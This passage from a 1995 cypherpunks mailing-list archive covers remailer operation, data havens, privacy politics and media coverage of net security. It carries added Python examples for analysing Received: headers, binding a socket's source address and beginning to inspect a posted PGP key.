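    r"(?:.*?\bid\s+(?P<qid>[^\s;]+))?",
    re.I,
)


def parse_hops(raw):
    """Return the Received: hops in chronological order (first relay first)."""
    hops = []
    for value in message_from_string(raw).get_all("Received", []):
        m = HOP_RE.match(" ".join(value.split()))  # unfold continuation lines
        if not m:
            continue
        seen = (m.group("observed") or "").split()
        hops.append({
            "claimed": m.group("claimed"),
            "observed": seen[0] if seen else None,
            "by": m.group("by"),
            "qid": m.group("qid"),
        })
    hops.reverse()  # each relay prepends, so the oldest hop is last in the file
    return hops


def related(a, b):
    """True if the names are equal or one is a subdomain of the other."""
    a, b = a.lower().rstrip("."), b.lower().rstrip(".")
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def analyze(raw):
    """Return (hops, findings); each finding is (kind, relay, value, evidence)."""
    msg = message_from_string(raw)
    hops = parse_hops(raw)
    findings = []
    # 1. The announced name does not fit the host the relay recorded.
    for hop in hops:
        if hop["claimed"] and hop["observed"] and not related(hop["claimed"], hop["observed"]):
            findings.append(("helo-mismatch", hop["by"], hop["claimed"], hop["observed"]))
    if hops:
        # 2. The From: domain does not fit the host that first handed the mail over.
        first = hops[0]
        from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
        origin = first["observed"] or first["claimed"]
        if from_domain and origin and not related(from_domain, origin):
            findings.append(("from-domain-vs-origin", first["by"], from_domain, origin))
    # 3. Message-Id carries a relay's queue id and host name, which suggests the
    #    relay stamped it because the submitting client supplied none.
    msgid = msg.get("Message-Id", "").strip("<> ")
    local, _, host = msgid.partition("@")
    for hop in hops:
        if hop["qid"] and hop["qid"] in local.split(".") and related(host, hop["by"]):
            findings.append(("message-id-stamped-by-relay", hop["by"], msgid, hop["qid"]))
    return hops, findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_HEADERS)[1]:
        print(finding)
```

Only the hops written by hosts you trust are evidence; anything below the first trusted relay's own Received: line is sender-supplied text.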




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 23 Jan 95 11:56:27 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501231945.LAA19843@largo.remailer.net>
Message-ID: <9501231956.AA12009@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    In 4.4 kernels, you just configure an alias address.
> 
> What is the mechanism by which a particular process picks an outgoing
> IP address?

Same as always -- the bind system call! (Remember, machines have
always had multiple IP addresses, just not on the same interface.)

.pm
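
The bind-before-connect mechanism described above, as an added example that is not part of the original message. It assumes a Linux host, where every 127.0.0.0/8 address is local, so 127.0.0.2 stands in for a configured alias address; the function names are hypothetical.

```python
import socket


def observed_source(source_ip=None, listen_ip="127.0.0.1"):
    """Open a TCP connection to a local listener and return the source
    address the listener sees for it.

    With source_ip=None the kernel picks the source address from its
    routing decision; with source_ip set, bind() pins it before connect().
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv, \
         socket.socket(socket.AF_INET, socket.SOCK_STREAM) as cli:
        srv.bind((listen_ip, 0))      # port 0: kernel picks a free port
        srv.listen(1)
        srv.settimeout(5)
        if source_ip is not None:
            # The step the message refers to: choose the outgoing address.
            # Port 0 still lets the kernel choose the ephemeral port.
            cli.bind((source_ip, 0))
        cli.connect(srv.getsockname())
        conn, peer = srv.accept()     # handshake already completed in the backlog
        conn.close()
        return peer[0]


def can_bind(ip):
    """True if this host will let a socket bind to ip, i.e. the address is
    configured on some interface (an alias counts)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind((ip, 0))
            return True
        except OSError:
            return False


if __name__ == "__main__":
    print("default source :", observed_source())
    print("bound source   :", observed_source("127.0.0.2"))
```

The listener, and any log it keeps, records only the bound address, which is why giving the remailer its own alias address separates its traffic from the host's other traffic at the IP layer.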




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Jan 95 13:06:20 PST
To: cypherpunks@toad.com
Subject: bruce serlings talk
Message-ID: <v01510101ab4986e2944e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Got this from a friend:

>To: rah@shipwright.com
>Date: Mon, 23 Jan 95 09:09:41 PST
>Subject: bruce serlings talk
>
>bob;
>can you get me a copy of bruce serlings talk given to law enforcement
>officials (at some conference) about computer crime.. I saw it published in
>some rag but I wonder if it's posted on cypherpunks??
>

I saw it here before. Is there a URL for it out there?

Thanks,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Jan 95 13:20:12 PST
To: cypherpunks@toad.com
Subject: CIAC Advisory on Net Threat
Message-ID: <199501232119.QAA00861@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


CIAC has issued its Advisory Notice F-08, dated today, 11:00 PST, on the
Net security threat described by Markoff, titled: 
 
     Internet Address Spoofing and Hijacked Session Attacks 
 
 
For those not subscribed to CIAC who want a copy: 
 
Send blank message with subject:  CIAC_f08 
 
 
 
Anybody want to force me to post it to the list?  It's about 12K, including
subscription info for CIAC.  I really hate fire.  Silencio is gelt.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Jan 95 13:51:11 PST
To: cypherpunks@toad.com
Subject: Re: bruce s(t)erlings talk
Message-ID: <v01510101ab4991b8c83e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>>can you get me a copy of bruce serlings talk given to law enforcement
                                 ^^^^^^^^
Uh, yes, well... I wonder if he's related to Rod...

S>T<erling, yes?

Post 'em first, and let God sort them out...
Bob



-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Jan 95 14:01:25 PST
To: cypherpunks@toad.com
Subject: Ben Goren Eyes Only
Message-ID: <199501232200.RAA06564@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995 Ben Goren <ben@Music.ASU.Edu> said: 
 
 
Mr. Goren, 
 
Mail to <ben@Music.ASU.Edu> ricochets.  Hep.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Sun, 22 Jan 95 22:08:28 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.3.89.9501221445.A8848-0100000@netcom10>
Message-ID: <Pine.SUN.3.91.950123170842.21383B-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, James A. Donald wrote:

> Both Australia and England have government established
> religions, so I expect there was a major turn out from
> those two nations.

An extract from the Australian Constitution:

116. The Commonwealth shall not make any law for establishing any
religion, or for imposing any religious observance, or for prohibiting the
free exercise of any religion, and no religious test shall be required as
a qualification for any office or public trust under the Commonwealth. 

Do please explain.

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 23 Jan 95 16:23:48 PST
To: cypherpunks@toad.com
Subject: US News and World Report
Message-ID: <Pine.3.89.9501231854.D27436-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I just looked over an article in US News and World Report today.  The cover
was a badge with the words "Cyber Cops" on it.  Guess which article I
scanned.
 
"Is Anything Safe in Cyberspace?"
 
I think it came over okay.  Quoted Chaum, mentioned the positive uses of
remailers, had extensive sections on privacy and on free speech.  It
was somewhat sympathetic to Clipper, didn't really take the protests
seriously.  Mentioned anonymous ecash.  It also had a quote skewering the
highway metaphor, "It's organic".
 
This was all after the four horsemen were trotted out, in all their glory.
If anyone looked at only the first six inches, it sounded like an attack on
the net as a whole.
 
I'd give it a 4 on an objective scale, 7 compared to what we expect.
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulus are not proven primes.  Key may be far weaker than
expected.  Encode your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.coKey fingerprint 
=  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Mon, 23 Jan 95 15:39:10 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: Re: The Remailer Crisis
In-Reply-To: <9501232220.AA18684@anchor.ho.att.com>
Message-ID: <9501232335.AA28911@marlin.ssnet.com>
MIME-Version: 1.0
Content-Type: text


Okay, I'm willing to start a remailer.  I'll have a new account on a
different machine within a few days and I'll do it there.

Anyone want to volunteer for a little hand holding while I get it
started?
-- 
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Mon, 23 Jan 95 02:42:35 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SUN.3.91.950122232148.24135H-100000@unix3.netaxs.com>
Message-ID: <Pine.SUN.3.91.950123184039.4882B-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 22 Jan 1995, Michael Handler wrote:
> On Wed, 18 Jan 1995, Jonathan Cooper wrote:
> 
> > > 	I could write a procmail recipe and a script in about an hour to
> > > automatically secret-share-split and redistribute the incoming submission.
> > 
> >    How would you handle retrieval of the data?  
> 
> 	Details, details. Just off the top of my head: an encrypted 
> database that logs where the pieces were split and sent to. When the 

I'd prefer to see a redundancy system here whereby the pieces each contain 
a cypher strip of info on the location of the others (not the entire 
location listing, that would be too insecure)
Maybe a few locations to store the locations of the segments.

just a thought.

------------------------------------------------------------------------------
  Computers   Communications   Reduced Rate IDD Service   Innovative Widgets
-Tel-(+852)-2334-8850-----------=j=R=T=----------------Fax-(+852)-2334-3042-

 Help protect the environment -- This message is made from recycled electrons
------------------------------------------------------------------------------
           Asia On-Line - Asia's Cheapest Internet Access Provider
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 19:00:48 PST
To: cypherpunks@toad.com
Subject: BlackNet as a Data Haven/Vault
In-Reply-To: <9501232223.AA18759@anchor.ho.att.com>
Message-ID: <199501240259.SAA03279@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com wrote:
> 
> Tim and Eric write things like:
> > I fully concur.  The connotations of the word "haven" imply activities
> > that ordinary people don't see themselves doing.  This means that
> > ordinary people won't generally use something called a "haven", even
> > if they might use exactly the same service called something else.
> 
> We can always call them "Private Storage Servers" or some such;
> an interesting question is whether the main uses will be
> for retrieval by the storer, or by someone else, or by a bunch of others,
> and how we describe the service may affect that.

To coin a phrase, I fully concur. A taxonomy of services like this is
needed.

I was talking to some recently about data havens/vaults/U-STOR-ITs, and
it was once again clear that our language is imprecise. Also, that who
the probable customers are, and how much they'll be willing to pay, is
unclear.

The "U-STOR-IT" model, similar to train lockers, safe deposit boxes,
storage lockers, etc., is fairly well protected, legally and socially.
Even though illegal things are often stored in such places, they
haven't been banned. (And last time I was in Europe, train lockers
were ubiquitously used, even in these terrorist times.)

But make the storage locker accessible to many people, and watch what
happens. (I can't recall a good case on this, but I'm sure such "dead
drops" would not go unscathed.)

For example, the U-STOR-IT model applied to data is already common:
remote backups, courier services that pick up DAT backups everyday,
etc.

But announce a site is for the anonymous storage and retrieval of
files, a la storing commercial software, and watch for fireworks! (The
recent outcome in the LaMacchia case notwithstanding....)

Of course placing such sites outside the U.S. is one approach. Placing
them at the end--or somewhere-- of a chain of remailers is another
approach. The message pool approach used for BlackNet says that the
site need not even be traceable: just encrypt once or twice (once to
keep the contents secret, another to encrypt to BlackNet's public key)
and put it into a message pool or other publicly readable place.
Then BlackNet grabs it, untraceably, and decrypts it, extracts its
digital money storage fee, and holds the file. When a suitably-signed
"storage receipt" is posted publicly, BlackNet encrypts the file to
the public key provided, and posts the file.

Simple, eh? (Newcomers are likely to ask at this point: "But what's to
keep BlackNet from cashing the digital money and then not sending the
file out?" First, the encrypted data is of no use to BN, so the
marginal value to them is nil. Second, potential customers will likely
test the service with dummy files, etc. Third, reputations do matter.)

But of course the taxonomy needs to be done by anybody seriously
planning such a thing, and careful analysis of weaknesses and attacks
should be done.

(By the way, I've been remiss in not congratulating relative newcomer to
the list, Wei Dai, for his insightful work on traffic analysis of
remailers. It's the kind of work Hal Finney and Matt Blaze, and
others, have long been doing, and I find it very encouraging. I'm not
trying to sound judgmental here, just saying some of us appreciate
this kind of detailed analysis. Much more is needed.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 23 Jan 95 20:01:32 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <9501232220.AA18684@anchor.ho.att.com>
Message-ID: <199501240400.UAA20706@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: wcs@anchor.ho.att.com

   Tim writes:
   > One thing I should've noted is that a Linux-based cheap remailer is
   > mostly useless without a "live connection" to the Net. 

   I disagree - live connections  are great for fast-response systems,
   but we got along just fine in the uucp dialup world with occasional
   connections; 

And if you get someone to do secondary MX for you that _is_ fulltime
connected, then the only latency for mail is the poll time.  If you're
on an ISDN line, for example, you can get online and poll every five
minutes for ten seconds at a time (ten seconds only when there's no
mail), cutting down line charges for fulltime _idle_ connectivity by a
factor of thirty.  Not all that expensive at all, really.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@chewy.wookie.net>
Date: Mon, 23 Jan 95 18:31:26 PST
Subject: Re: US News and World Report
In-Reply-To: <Pine.3.89.9501231854.D27436-0100000@vern.bga.com>
Message-ID: <Pine.3.89.9501232123.A21892-0100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, Nathan Zook wrote:

> This was all after the four horsemen were trotted out, in all their glory.
> If anyone looked at only the first six inches, it sounded like an attack on
> the net as a whole.
>  
> I'd give it a 4 on an objective scale, 7 compared to what we expect.

I just read this piece the other day. Had people from FLETC talking about 
people being "victimized by information" and included lines that 
doublespeaked supporting freedom of speech while asking what types of 
speech should be made illegal, making these two contradictory ideas seem 
perfectly compatible and natural.

- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Mon, 23 Jan 95 18:55:27 PST
To: Remailer-Operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501231457.GAA16462@largo.remailer.net>
Message-ID: <m0rWbPO-000yxSC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


eric@remailer.net (Eric Hughes) wrote:

>    From: "John A. Perry" <perry@jpunix.com>
> 
>    > A question, from an internet mail novice:  How does the 'invisible'
>    > remailer advertise itself as its 'visible' name in its outgoing
>    > mail?  
> 
> Perhaps the easiest thing to do is to add a Received: field to all
> outgoing remailed mail so that it appears that the visible site is
> handling the invisible site as if it were UUCP or a firewall or
> mailhub or something.  Since anybody who really wants to find out who
> actually owns the machine is going to, you might as well indicate the
> real relation up front, namely, that the owner of the visible machine
> routes mail for the invisible one.  In other words, there would be two
> Received: fields in outgoing remailed mail.  The first (lower, later
> in the stream) Received: field would be generated by the remailer
> software.  The second would be added by the system sendmail.
> It will be tricky to make this look just right.

This doesn't really sound too difficult.  Just have a script run as
user uucp which adds the header and hands the message to sendmail.

> Another way to mask this is to give the remailer its own IP address.
> It's easy to recompile extra slip interfaces into a kernel; each gets
> its own IP address.  Routing the output of the remailer through these
> extra interfaces can require some hackery, though.  I only know about
> this second hand, but evidently the BSDI 1.1 release added some BSD
> 4.4 feature that makes this kind of IP hack much easier.  

Yes, this can be done, but getting IP addresses isn't easy for most
people.  I would propose that we use the unassigned IP address blocks
which are reserved for private networks (see RFC 1597).  In fact,
we could even connect the remailer systems that use the private address
space via IP tunneling (swIPe maybe?  or SLIP over telnet?)  These
remailer hosts could then communicate with each other on a private
network, and gateway mail to the internet via "firewall" hosts.  This
approach would also allow us to connect private machines to the
remailer network by providing IP connectivity to hosts which currently
use software such as Term or TIA.  Having more remailers on private
machines would be a good thing IMHO.  Finally, such a network might
serve as a basis for building future untraceable/anonymous IP routing
capability.

> What we're creating here, of course, is virtual machines.  Unix
> kernels have supported multiple processes and multiple users for a
> long time.  I expect multiple virtual machines this decade.

I wonder if the "Term" program could be modified to act as a virtual
machine?  For those not familiar with the program, it creates a unix
domain socket and supplies IP services via it, forwarding them over
a modem connection.  Many programs have been modified to work with
it.  Perhaps term could be modified to send its output to an IP
interface instead.  Each user on the system can run his own term
process and have his own virtual machine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 22:23:44 PST
To: slowdog@chewy.wookie.net (slowdog)
Subject: Doublespeak, Doublethink, Thought Police, and 1984
In-Reply-To: <Pine.3.89.9501232123.A21892-0100000@chewy.wookie.net>
Message-ID: <199501240622.WAA26904@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


slowdog wrote:

> I just read this piece the other day. Had people from FLETC talking about 
> people being "victimized by information" and included lines that 
> doublespeaked supporting freedom of speech while asking what types of 
  ^^^^^^^^^^^^^
> speech should be made illegal, making these two contradictory ideas seem 
> perfectly compatible and natural.

Slowdog is exactly right! This whole debate we're seeing is a perfect
example of "doublethink," in which two opposing ideas are held in
one's head at the same time, eventually eroding all principles
(so that if four fingers are held up, but the State says "five," then
it really _is_ five fingers being held up).

I first read "1984" in around 1966, when I was in the 8th grade, and
it has stuck with me ever since. No other novel has added as many
basic linguistic and political ideas to the language as this novel--by
yet another member of the Eric Conspiracy Secret Laboratories!

Big Brother, Thought Police, thoughtcrime, doublespeak, doublethink,
Big Brother is Watching You!, War is Peace, Freedom is Slavery,
sexcrime, unperson, and probably several other terms I've left
out. All are part of our language.

Too bad people on both the left and the right are missing the lesson.

Any Cypherpunk who hasn't read this novel should run out tonight to
the All-Nite Barnes and Borders Megastore and buy a copy.


--Tim May, Citizen-Unit 227-80-5894

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 23 Jan 95 22:32:46 PST
To: Dave Horsfall <dave@esi.COM.AU>
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.SUN.3.91.950124104650.28961G-100000@eram.esi.com.au>
Message-ID: <Pine.3.89.9501232257.A13814-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Dave Horsfall wrote:

> Date: Tue, 24 Jan 1995 10:56:06 +1100 (EST)
> You might be amused to know that our Governor-General (the "Queen's Man")
> is himself an avowed atheist - is it likely he would have been appointed
> by a pro-religious government?

Establishing a religion is usually an act of hostility towards religion,
not an act of support.

He who pays controls.

Recollect how the Church of England originally came to be established?

The King put the church on his payroll, after confiscating its 
independent sources of revenue.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: plaz@netcom.com (Plaz)
Date: Mon, 23 Jan 95 22:44:59 PST
To: cypherpunks@toad.com
Subject: UN passes Information Super-Highway Beautification Resolution
Message-ID: <v02110100ab49d6aa5898@[192.187.134.54]>
MIME-Version: 1.0
Content-Type: text/plain


In regards to Tim's Internetpol comment:

I wrote this back in april:
________________________________________________________________________________
Headline: Emergency Beautification of the InfoBahn

UN Press Conference, April 8, 1996

UN Spokesperson Lance Rotweiler announced today that the "Information
Super-Highway Beautification Resolution" had been passed in an Emergency
Session of the UN Security Council. The resolution sets decency standards
for electronic communications and grants broad powers to Interpol for
enforcement of these standards.

"There's a new sheriff in town," Rotweiler said. "It's time for
child-pornographers, perverts and cryptoanarchists to get off the net. For
too long, we have been allowing these sodomists to creep into our living
rooms and seduce our children through the information highway. It's time to
clean up."

The resolution also calls for a ban on non-escrowed cryptography for
personal communications and anonymous communications, which Rotweiler says
is often used to conceal criminal and immoral activity.

"Enforcement of the resolution has already begun," Rotweiler stated. "In
Canada this morning, a warrant was issued for the arrest of a hacker who
has blocked the removal of various usenet groups that advocate illegal and
immoral activities, such as alt.sex.bestiality and alt.sex.bondage. We do
regret that the individual chose to resist arrest and was shot under the
mistaken assumption that he was armed, but as you know these groups were
available to the average nine year old with a remote. You mess with our
kids, and you deserve what you get."

[Editor's Note: The hacker, Brian Lee of Toronto Canada, was brandishing a
mini-vac commonly used for cleaning computer keyboards, while shouting
obscenities. The arresting officers mistook this appliance for a pistol and
opened fire. Brian Lee is survived by a wife and 2.5 children. See related
story "Pornography Accomplice Dies in Shoot-out"]

"New operations are planned for the newly created branch of Interpol, which
we are calling 'InfoPol'," Rotweiler continued.

When asked whether the 'InfoPol' had world-wide jurisdiction, Rotweiler
responded, "Yes, but certain holdouts in the community of nations are
refusing to accept this. Most notably, Bolivia, Belize and Western Samoa,
nations which make their stock in trade dealing with the criminal element.
We expect these nations to come around, as the resolution calls for
economic sanctions against those countries that refuse to cooperate in this
great venture."

End Note: When stepping away from the podium, Rotweiler was heard to
mumble, "This ought to get her tentacles in a knot." When asked to explain
this comment the UN spokesperson declared the press conference to be at an
end.

________________________________________________________________________________
Geoff Dale        |           Mail me ->                  mailto:plaz@netcom.com
AnarchyPPL Anarch |          Visit me ->                http://io.com/user/plaz/
Plastic Beethoven |           Hire me ->        http://io.com/user/plaz/rez.html
plaz@netcom.com   |AnarchyPPL Charter -> http://io.com/user/plaz/AnarchyPPL.html
________________________________________________________________________________
                      Do have nasty meme infestations?
                     Well then, you need new Meme-Away!
              The most effective memicide spray on the market.
                          *Now with extra CFCs*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 24 Jan 95 01:20:53 PST
To: jya@pipeline.com (John Young)
Subject: Re: CIAC Advisory on Net Threat
In-Reply-To: <199501232119.QAA00861@pipe1.pipeline.com>
Message-ID: <199501240919.BAA28173@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> CIAC has issued its Advisory Notice F-08, dated today, 11:00 PST, on the
> Net security threat described by Markoff, titled: 
>      Internet Address Spoofing and Hijacked Session Attacks 
> For those not subscribed to CIAC who want a copy: 
> Send blank message with subject:  CIAC_f08 
>  
    Or just download directly from CIAC at:

 ciac.llnl.gov:/pub/ciac/bulletin/f-fy95/f-08.ciac-IP-spoofing-hijacked-sessions-attacks 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 24 Jan 95 03:26:09 PST
To: cypherpunks@toad.com
Subject: DOJ Computer Seizure Guidelines
Message-ID: <199501241124.DAA24739@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Seen on comp.society.privacy.  This document was obtained
    by an FOIA suit by EPIC. I ftp'd from the cpsr.org but even
    at 2:30 a.m. PST the 315 Kbytes took an excruciating 481 seconds.

    For those on netcom it's on /ftp/pub/ba/bart easily available,
    if others can get through to ftp.netcom.com at least the
    transfer might be faster than cpsr.

    Encrypted information is dealt with on pps 54-55 in particular.
    I'll leave conclusions to our lawyerly types.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 24 Jan 95 02:04:22 PST
To: cypherpunks@toad.com
Subject: CNN on "New threat to the net."
Message-ID: <Pine.SV4.3.91.950124035704.22567A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


I just had CNN on for background noise. They did a one minute piece on a 
new threat to the internet. HACKERS. Bidzos for some reason was on it and 
they went slightly into why transmitting credit card numbers as plain 
text was stupid. Their estimate is that encryption is at least five years 
away. Just amazing... BTW- they recommended that everyone install routers 
to hinder hackers. Check it out...it was on headline news so it probably 
will be repeated every half hour.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 24 Jan 95 04:26:42 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501240400.UAA20706@largo.remailer.net>
Message-ID: <199501241215.GAA00443@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> And if you get someone to do secondary MX for you that _is_ fulltime
> connected, then the only latency for mail is the poll time.  If you're
> on an ISDN line, for example, you can get online and poll every five
> minutes for ten seconds at a time (ten seconds only when there's no
> mail), cutting down line charges for fulltime _idle_ connectivity by a
> factor of thirty.  Not all that expensive at all, really.
> 
> Eric
>
Exactly how does this work at your location Eric? Here in Southwestern Bell
we don't use the D except for call initiation and termination. There is no
usage tariff other than this. Hence, we have no idle charge. My bill runs
a flat $72 and some change each month.

Take care.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Tue, 24 Jan 95 06:29:28 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: New anonymous remailer.
Message-ID: <199501241428.GAA00363@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text



Ok, I'm happy to announce a new anonymous remailer, the Tower Anonymous
Remailer, at remailer@tower.techwood.org

Standard cpunks remailer, installed from the remailer installation
script 1.01 from ftp.csua.berkeley.edu, supporting pgp.

Here's the server's public key, which I have submitted to 
io.com:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBNAy8iqAQAAAECALHjiFPr7Is0NptniDkYJ9UnRFM3Pn9Lz7mrPd58uo/EPMF5
bm3TjfAmdMlw2oBTtm7Ch3dsfBY44XEEwzVRkb0ABRG0NlRvd2VyIEFub255bW91
cyBSZW1haWxlciA8cmVtYWlsZXJAdG93ZXIudGVjaHdvb2Qub3JnPg==
=Rfb5
-----END PGP PUBLIC KEY BLOCK-----

Response times should be good.  (Note that my network's connection
to the backbone is being changed in the next few days, and this may
affect things in the meantime.)

Anyplace else I should submit the key for maximal exposure?  

How might I go about being added to the "ping list" ?

--
Craig Johnston
caj@tower.techwood.org
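
An added example, not part of the original post or of the remailer software: one way to look inside a published PGP 2.x key block before adding it to a keyring, run here on the block from the announcement above. The helper names and the 2048-bit policy floor are assumptions made for this example; only old-format packets and v2/v3 RSA keys are handled.

```python
import base64
from datetime import datetime, timezone

# Key block exactly as posted in the announcement above.
ARMORED_KEY = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBNAy8iqAQAAAECALHjiFPr7Is0NptniDkYJ9UnRFM3Pn9Lz7mrPd58uo/EPMF5
bm3TjfAmdMlw2oBTtm7Ch3dsfBY44XEEwzVRkb0ABRG0NlRvd2VyIEFub255bW91
cyBSZW1haWxlciA8cmVtYWlsZXJAdG93ZXIudGVjaHdvb2Qub3JnPg==
=Rfb5
-----END PGP PUBLIC KEY BLOCK-----
"""

MIN_RSA_BITS = 2048  # assumption: policy floor chosen for this example


def crc24(data):
    """OpenPGP armor checksum (RFC 4880, section 6.1)."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def dearmor(text):
    """Return (binary data, checksum_ok) for an ASCII-armored block."""
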